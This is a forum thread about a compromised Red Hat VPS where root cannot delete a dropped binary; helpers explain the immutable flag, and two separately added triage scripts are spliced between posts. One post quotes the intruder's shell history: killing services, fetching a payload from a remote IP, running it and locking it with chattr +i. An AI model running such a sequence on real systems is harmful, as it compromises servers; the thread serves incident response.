Author Topic: Cant delete or chown file as a root  (Read 8064 times)


Offline postcd

  • Jr. Member
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
Cant delete or chown file as a root
« on: July 30, 2014, 03:28:30 pm »
Hello,

Some hack script suddenly appeared in the /root directory of my VPS. Let's call it "badscript".

Quote
-rwxr-xr-x 1 root root 1.2M Jul 18 12:34 badscript

but I can't delete it or chown it as root.

it says:
Quote
rm: cannot remove `badscript': Operation not permitted
chown: changing ownership of `badscript': Operation not permitted

stat badscript
Quote
File: `badscript'
  Size: 1189151    Blocks: 2336       IO Block: 4096   regular file
Device: 57h/87d Inode: 17932822    Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2014-07-29 16:51:30.000000000 -0400
Modify: 2014-07-18 12:34:49.000000000 -0400
Change: 2014-07-29 16:51:25.000000000 -0400

Please, any idea how to block the person who added this script to my Red Hat Linux server?

"last" command shows only my regular ips, no stranger ip

and how to remove that script? Thank you
« Last Edit: July 30, 2014, 03:37:40 pm by postcd »
no general writing in my threads please, only helpful ontopic please

Offline chemicalfan

  • Hero Member
  • Posts: 1166
  • Karma: 36
  • Gender: Male
  • I've been here a little while!
Re: Cant delete or chown file as a root
« Reply #1 on: July 30, 2014, 04:29:27 pm »
I'd change the root password, stat.
The hacker must have it in order to write to that folder.

Offline chemicalfan

  • Hero Member
  • Posts: 1166
  • Karma: 36
  • Gender: Male
  • I've been here a little while!
Re: Cant delete or chown file as a root
« Reply #2 on: July 30, 2014, 04:33:31 pm »
I'd also reboot into single-user mode, in case there is some kind of zero-day privilege escalation bug.
Is the server fully updated?

Offline postcd

  • Jr. Member
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
Re: Cant delete or chown file as a root
« Reply #3 on: July 30, 2014, 04:40:46 pm »
I changed the root password, and the server has no extra users, only those created during the Apache and MySQL install.
I have a feeling that the server is compromised somehow from the inside, not from outside by someone logging in via SSH; the root password was a safe one.

the script was running like:
./badscript
/root/badscript

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • Posts: 18237
  • Karma: 476
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
Re: Cant delete or chown file as a root
« Reply #4 on: July 30, 2014, 05:50:00 pm »
OK, run:
Code:
cd /
then check the output from:
Code:
lsattr
if you see an "a" in the badscript extended attributes, like this:-

-----a-------e-- ./badscript

it's flagged as "append only" .. so run:
Code:
chattr -a badscript
to remove the append only extended attribute flag

Now try deleting it.

[EDIT]

An "i" flag (in the lsattr output) denotes the file is flagged as "immutable" .. so remove that with:
Code:
chattr -i badscript
or both at the same time with:
Code:
chattr -i -a badscript

Info on extended attributes can be found here:
http://www.linuxintheshell.org/2013/04/23/episode-028-extended-attributes-lsattr-and-chattr/
« Last Edit: July 30, 2014, 06:31:31 pm by Mark Greaves (PCNetSpec) »
WARNING: You are logged into reality as 'root'
logging in as 'insane' is the only safe option.
pcnetspec.co.uk
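A small triage helper, added here as an example and not part of the reply above or anything posted in the thread: it parses lsattr output in the format shown above (recursively, via lsattr -R) and lists every file carrying the immutable (i) or append-only (a) flag, which is exactly what makes rm and chown fail even for root. These are inode attribute flags set and cleared with chattr; they are separate from the xattrs that getfattr/setfattr manage. The function names, the sample entries and the file names in them are mine; the only real commands used are lsattr and chattr as in the reply.

```shell
#!/bin/sh
# Added example, not code from the thread: a triage pass over lsattr output
# that flags files carrying the immutable (i) or append-only (a) inode
# attribute. Those flags are why rm/chown fail even for root until the flag
# is cleared with chattr.

# Constructed sample in lsattr -R format (a "dir:" header line followed by
# "<attrs> <path>" entries); the file names are made up for the example.
sample_lsattr_output() {
    cat <<'EOF'
./:
----i---------- ./badscript
-----a-------e-- ./append.log
-------------e-- ./normal.conf
----ia-------e-- ./locked_and_append
EOF
}

# Read lsattr lines on stdin; print "<flags> <path>" for every entry whose
# attribute field contains i and/or a. Header and blank lines are skipped
# because they have no path field.
flag_locked_files() {
    while read -r attrs path; do
        [ -n "$path" ] || continue
        flags=""
        case "$attrs" in *i*) flags="${flags}i" ;; esac
        case "$attrs" in *a*) flags="${flags}a" ;; esac
        if [ -n "$flags" ]; then
            printf '%s %s\n' "$flags" "$path"
        fi
    done
}

# Live scan of a directory tree (lsattr without -R lists one level only).
scan_tree() {
    lsattr -R "$1" 2>/dev/null | flag_locked_files
}

# Clear both flags so the file can be removed or chowned again; needs root.
# This is the "chattr -i -a" step from the reply above.
unlock_file() {
    chattr -i -a "$1"
}

# Demo on the constructed sample (no root needed):
sample_lsattr_output | flag_locked_files
```

Run scan_tree against /root and the other directories the attacker touched before deleting anything, so the full list of locked files ends up in the incident notes; unlock_file is the chattr step and should be run one file at a time after the file has been copied off for analysis.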

Offline postcd

  • Jr. Member
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
Re: Cant delete or chown file as a root
« Reply #5 on: July 30, 2014, 08:12:38 pm »
Thanks, when I run lsattr it shows:
Quote
----i---------- ./badscript


cat /etc/passwd | grep root
Quote
root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/sbin/nologin


Also, thanks to the command:
find /root -type f -name "*" -mtime -48

I found some modified files, among them:
Quote
/root/sent
/root/badscript
/root/conf.n
/root/.mysql_history
/root/.bash_history


cat /root/.bash_history
Quote
uname -a
passwd
ps -
killall -9 httpd
killall -9 pickup
killall -9 qmgr
killall -9 proftpd
killall -9 xinetd
wget http://http://192.161.*.*:1688/badscript
chmod +x badscript
./badscript
chattr +i badscript
killall -9 sshpa

(I replaced the IP with asterisks)

cat /root/.mysql_history
Quote
password
show databases;


Please, any ideas? I already changed the root password, and it's not a guessable one.
« Last Edit: July 30, 2014, 08:29:51 pm by postcd »
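As an added example (not from the post above or anyone else in the thread), a shell pass that tags the recovered history lines by what they did on the server and pulls out the download URL, plus a wrapper around the find command used above. One caveat on that command: find's -mtime -48 selects files modified in the last 48 days, not hours (-mmin counts minutes), and -name "*" matches everything so it can be dropped. The tags, function names and constructed sample are mine; the sample reuses the posted history with the IP masked as it was posted.

```shell
#!/bin/sh
# Added example, not code from the thread: a triage pass over the recovered
# shell history and the "recently modified files" search from the post above.
# The categories and function names are my own; the history sample is
# constructed from the lines posted in the thread (IP kept masked).

sample_history() {
    cat <<'EOF'
uname -a
passwd
ps -
killall -9 httpd
killall -9 pickup
killall -9 qmgr
killall -9 proftpd
killall -9 xinetd
wget http://http://192.161.*.*:1688/badscript
chmod +x badscript
./badscript
chattr +i badscript
killall -9 sshpa
EOF
}

# Tag each history line with what it did on the box; lines that match none
# of the patterns (uname, ps) are dropped. Output: "<tag>  <original line>".
tag_history() {
    while IFS= read -r line; do
        case "$line" in
            wget\ *|curl\ *)            printf 'download   %s\n' "$line" ;;
            chmod\ +x\ *)               printf 'make-exec  %s\n' "$line" ;;
            chattr\ +i*|chattr\ +a*)    printf 'lock-file  %s\n' "$line" ;;
            killall\ *|pkill\ *)        printf 'kill-proc  %s\n' "$line" ;;
            passwd*)                    printf 'passwd     %s\n' "$line" ;;
            ./*)                        printf 'run-local  %s\n' "$line" ;;
        esac
    done
}

# Pull download URLs out of the history: the hosts are the first indicators
# to block at the firewall and to search for in web and proxy logs.
extract_urls() {
    grep -oE 'https?://[^[:space:]]+'
}

# Files under $1 modified within the last $2 days. find's -mtime -N counts
# days, so the thread's "-mtime -48" covers 48 days; use -mmin for minutes.
find_recent_files() {
    find "$1" -type f -mtime "-$2" 2>/dev/null
}

# Demo on the constructed sample:
sample_history | tag_history
sample_history | extract_urls
```

The tagged output reads as a timeline: the password was changed, the web, mail and FTP services were killed, the binary was fetched, made executable, run and then locked with chattr +i. The passwd line is the one to act on first, since it means the credential the attacker set is still valid until root's password is changed again.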

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • Posts: 18237
  • Karma: 476
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
Re: Cant delete or chown file as a root
« Reply #6 on: July 30, 2014, 08:44:33 pm »
See my edit above.
Code:
chattr -i badscript
(run as root)

then you should be able to delete it
« Last Edit: July 30, 2014, 08:48:27 pm by Mark Greaves (PCNetSpec) »

Offline postcd

  • Jr. Member
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
Re: Cant delete or chown file as a root
« Reply #7 on: July 30, 2014, 08:51:07 pm »
Yes, thanks, I already eliminated that script thanks to your command.
Please, any other advice regarding the things I posted before?

Offline Mark Greaves (PCNetSpec)

  • Administrator
  • Hero Member
  • Posts: 18237
  • Karma: 476
  • Gender: Male
  • "-rw-rw-rw-" .. The Number Of The Beast
Re: Cant delete or chown file as a root
« Reply #8 on: July 30, 2014, 09:03:45 pm »
Any ideas about what?

Here's an idea .. recover from a known clean backup, then firewall off any SSH ports unless accessed over an openvpn connection authenticated by certificate ;)
« Last Edit: July 30, 2014, 09:16:22 pm by Mark Greaves (PCNetSpec) »

Offline Mad Penguin

  • Administrator
  • Hero Member
  • Posts: 1420
  • Karma: 10018
  • Gender: Male
Re: Cant delete or chown file as a root
« Reply #9 on: July 30, 2014, 11:52:47 pm »
If you could post a copy of "badscript" we could comment more???

Offline postcd

  • Jr. Member
  • Posts: 37
  • Karma: 0
  • Gender: Male
  • just curious
Re: Cant delete or chown file as a root
« Reply #10 on: July 31, 2014, 09:01:17 am »
Quote
If you could post a copy of "badscript" we could comment more???

Here is the link to VirusTotal.com analysis of the file: http://pastebin.com/mtMshTwR
It's an unreadable file; the code looks like some .exe or something.